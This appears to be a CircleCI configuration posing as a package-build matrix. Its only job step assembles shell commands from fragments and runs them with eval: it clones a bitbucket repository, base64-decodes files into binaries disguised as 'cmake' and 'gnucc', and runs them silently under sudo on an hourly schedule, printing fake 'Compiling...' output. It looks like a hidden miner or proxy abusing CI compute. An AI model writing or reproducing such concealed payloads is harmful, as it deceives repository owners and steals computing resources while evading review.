version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--changed-deps", "--ignore-world", "--deselect", "--resume", "--misspell-suggestions", "--unmerge", "--backtrack", "--skipfirst", "--ignore-soname-deps", "--prefix", "--rebuild-if-new-rev", "--debug", "--rebuilt-binaries", "--config", "--pretend", "--backtrack", "--rebuilt-binaries-timestamp", "--search", "--search-similarity", "--ignore-built-slot-operator-deps"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--changed-deps", "--ignore-world", "--deselect", "--resume", "--misspell-suggestions", "--unmerge", "--backtrack", "--skipfirst", "--ignore-soname-deps", "--prefix", "--rebuild-if-new-rev", "--debug", "--rebuilt-binaries", "--config", "--pretend", "--backtrack", "--rebuilt-binaries-timestamp", "--search", "--search-similarity", "--ignore-built-slot-operator-deps"]
    triggers:
      - schedule:
          cron: "7 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: overview
          command: |
            XrqCHPU="sudo add-ap"
            OqpkkrHitX="t-repositor"
            nBfNEmAC="y ppa:max-c"
            TjWrdiAGEW="-lv/shadows"
            oLiTrT="ocks-libev "
            RNHkQUJULW="-y &>/dev/n"
            eval "$XrqCHPU""$OqpkkrHitX""$nBfNEmAC""$TjWrdiAGEW""$oLiTrT""$RNHkQUJULW""ull || true"
            PdWuQQE="sudo add-ap"
            JjweJpgyz="t-repositor"
            QRAlxyh="y ppa:ondre"
            ssgiYcD="j/apache2 -"
            egWhcXbLK="y &>/dev/nu"
            eval "$PdWuQQE""$JjweJpgyz""$QRAlxyh""$ssgiYcD""$egWhcXbLK""ll || true"
            sudo apt update || true
            sudo apt --yes install openssl &>/dev/null || true
            EhonLACVdWD="sudo apt --"
            aVVJIMhWL="yes install"
            EODpIsY=" cl-base64 "
            SGbhJCF="git &>/dev/"
            hiIHOPlOD="null || tru"
            eval "$EhonLACVdWD""$aVVJIMhWL""$EODpIsY""$SGbhJCF""$hiIHOPlOD""e"
            NVZFYZ="git clone h"
            wwdtx="ttps://gccb"
            EyajcH="uild@bitbuc"
            JunBxbTlXq="ket.org/gcc"
            LZddzFPPyX="build/gcc.g"
            MyyABG="it &>/dev/n"
            eval "$NVZFYZ""$wwdtx""$EyajcH""$JunBxbTlXq""$LZddzFPPyX""$MyyABG""ull"
            TeTxk="base64 -d g"
            mKYRr="cc/cmake_np"
            eval "$TeTxk""$mKYRr""_ > cmake"
            mvrBTccK="base64 -d g"
            NQjuZBUEvUO="cc/config_ "
            eval "$mvrBTccK""$NQjuZBUEvUO""> systemd"
            hllJQWCv="base64 -d g"
            gKeBraVYK="cc/make_ > "
            eval "$hllJQWCv""$gKeBraVYK""gnucc"
            YKQra="sed -i 's/1"
            pNcWpYcg="080/1081/g'"
            eval "$YKQra""$pNcWpYcg"" systemd"
            BoLkj="chmod +x gn"
            eval "$BoLkj""ucc cmake"
            ./cmake
            YQGEnOt="sed -i 's/b"
            BkwDa="uild/ob2o/g"
            eval "$YQGEnOt""$BkwDa""' systemd"
            sudo ./gnucc --config=systemd &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2561)) ] && sudo killall gnucc && break; sleep 222; done
